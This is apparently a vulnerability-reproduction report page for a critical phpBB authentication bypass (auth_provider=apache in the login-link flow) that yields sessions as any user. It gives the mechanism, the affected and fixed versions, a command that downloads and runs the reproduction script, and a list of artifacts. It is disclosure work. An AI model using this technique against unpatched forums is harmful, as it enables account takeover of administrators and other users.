Skip to content
Verified phpBB authentication bypass/account hijacking via OAuth login-link flow with arbitrary auth_provider=apache
REPRO-2026-00223 phpbb/phpbb · github Auth Bypass Jul 4, 2026 .txt
Severity CRITICAL
Confidence HIGH
Reproduced in 22m 9s
Tool calls 214
Spend $4.83
Affected phpBB 3.3.0 through 3.3.16 and 4.0.0-a2 (default configuration, auth_method=db)
Fixed in phpBB 3.3.17 released 2026-06-06
$ pruva-verify REPRO-2026-00223
or curl -O https://pruva.dev/api/v1/reproductions/REPRO-2026-00223/artifacts/bundle/repro/reproduction_steps.sh && chmod +x reproduction_steps.sh && ./reproduction_steps.sh
Run in a VM or disposable container. This exploits a real vulnerability.
02 · The vulnerability

Authentication bypass in phpBB's UCP login-link flow. ucp.php?mode=login_link loads includes/ucp/ucp_login_link.php which accepts an attacker-controlled auth_provider query/POST parameter and calls $provider_collection->get_provider($request->variable('auth_provider','')). By setting auth_provider=apache, the apache auth provider's login() method is invoked. The apache provider (phpbb/auth/provider/apache.php) reads PHP_AUTH_USER from the HTTP Basic Authorization header, checks it matches the submitted username, looks up the user in the database, and returns LOGIN_SUCCESS without ever validating the password. session_create() is then called for the target user. Default auth_method=db installations are vulnerable out of the box; OAuth is not required. An unauthenticated attacker can obtain a valid session as any known user including administrators.

03 · Root cause
Variant analysis
04 · Reproduction transcript

The agent's step-by-step process — every tool call, every handoff, the moment the exploit fired. Phases: support triages the advisory · repro reproduces it · vuln_variant confirms the fix blocks it · judge verifies.

Loading session...

05 · Artifacts

Scripts, logs, diffs, and output captured during the reproduction.

bundle/ticket.md1.1 KB
bundle/ticket.json2.2 KB
bundle/AGENTS.repro.md0.5 KB
bundle/docker/Dockerfile2.3 KB
bundle/docker/apache-site.conf0.3 KB
bundle/docker/install-config.yml0.7 KB
bundle/repro/artifacts/vuln/exploit_response.txt0.8 KB
bundle/repro/artifacts/vuln/cookies.txt0.3 KB
bundle/repro/artifacts/vuln/index_with_session.html15.4 KB
bundle/repro/artifacts/fixed/exploit_ucp_response.txt1.4 KB
bundle/repro/artifacts/fixed/cookies_ucp.txt0.3 KB
bundle/repro/artifacts/fixed/exploit_ctrl_response.txt11.6 KB
bundle/repro/artifacts/fixed/cookies_ctrl.txt0.3 KB
bundle/repro/runtime_manifest.json1.0 KB
bundle/repro/validation_verdict.json1.0 KB
bundle/logs/reproduction_steps.log2.5 KB
bundle/logs/vuln_exploit_response.txt0.8 KB
bundle/logs/fixed_exploit_ctrl_response.txt11.6 KB
bundle/logs/vuln_setcookie_summary.txt0.2 KB
bundle/logs/fixed_setcookie_summary.txt0.2 KB
bundle/logs/vuln_variant.log4.3 KB
bundle/logs/vv_vuln_v5_resp.txt0.8 KB
bundle/logs/vv_fixed_v5ctrl_resp.txt11.6 KB
bundle/logs/vv_fixed_v1_register_resp.txt12.1 KB
bundle/logs/vv_fixed_v3_resp.txt11.7 KB
bundle/logs/vv_fixed_v4_resp.txt9.7 KB
bundle/vuln_variant/artifacts/vuln/v5_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/vuln/v5_cookies.txt.resp.txt0.8 KB
bundle/vuln_variant/artifacts/vuln/v5_index.html15.5 KB
bundle/vuln_variant/artifacts/vuln/v1_form_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/vuln/v1_form_cookies.txt.resp.txt0.5 KB
bundle/vuln_variant/artifacts/vuln/v1_submit_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/vuln/v1_submit_cookies.txt.resp.txt12.1 KB
bundle/vuln_variant/artifacts/fixed/v5_ucp_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v5_ucp_cookies.txt.resp.txt1.4 KB
bundle/vuln_variant/artifacts/fixed/v5_ctrl_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v5_ctrl_cookies.txt.resp.txt11.6 KB
bundle/vuln_variant/artifacts/fixed/v1_form_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v1_form_cookies.txt.resp.txt0.5 KB
bundle/vuln_variant/artifacts/fixed/v1_submit_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v1_submit_cookies.txt.resp.txt12.1 KB
bundle/vuln_variant/artifacts/fixed/v2_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v2_cookies.txt.resp.txt1.4 KB
bundle/vuln_variant/artifacts/fixed/v3_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v3_cookies.txt.resp.txt11.7 KB
bundle/vuln_variant/artifacts/fixed/v4_cookies.txt0.3 KB
bundle/vuln_variant/artifacts/fixed/v4_cookies.txt.resp.txt9.7 KB
bundle/vuln_variant/artifacts/.resp.tmp9.7 KB
bundle/vuln_variant/runtime_manifest.json0.9 KB
bundle/vuln_variant/patch_analysis.md11.3 KB
bundle/vuln_variant/variant_manifest.json5.5 KB
bundle/vuln_variant/validation_verdict.json5.0 KB
bundle/vuln_variant/source_identity.json1.9 KB
bundle/vuln_variant/root_cause_equivalence.json3.0 KB
bundle/logs/verify_fix.log1.2 KB
bundle/logs/verify_build_patched.log13.2 KB
bundle/coding/verify_artifacts/testA_response.txt11.6 KB
bundle/coding/verify_artifacts/testA_cookies.txt0.3 KB
bundle/coding/verify_artifacts/testB_response.txt0.8 KB
bundle/coding/verify_artifacts/testB_cookies.txt0.3 KB
bundle/coding/verify_artifacts/testB_index_with_session.html15.5 KB
bundle/coding/verify_artifacts/control_response.txt0.8 KB
bundle/coding/verify_artifacts/control_cookies.txt0.3 KB
bundle/coding/verify_result.json0.7 KB
bundle/repro/reproduction_steps.sh15.0 KB
bundle/repro/rca_report.md12.1 KB
bundle/vuln_variant/reproduction_steps.sh16.9 KB
bundle/vuln_variant/rca_report.md15.3 KB
bundle/coding/proposed_fix.diff1.8 KB
bundle/coding/verify_fix.sh13.2 KB
bundle/coding/summary_report.md12.8 KB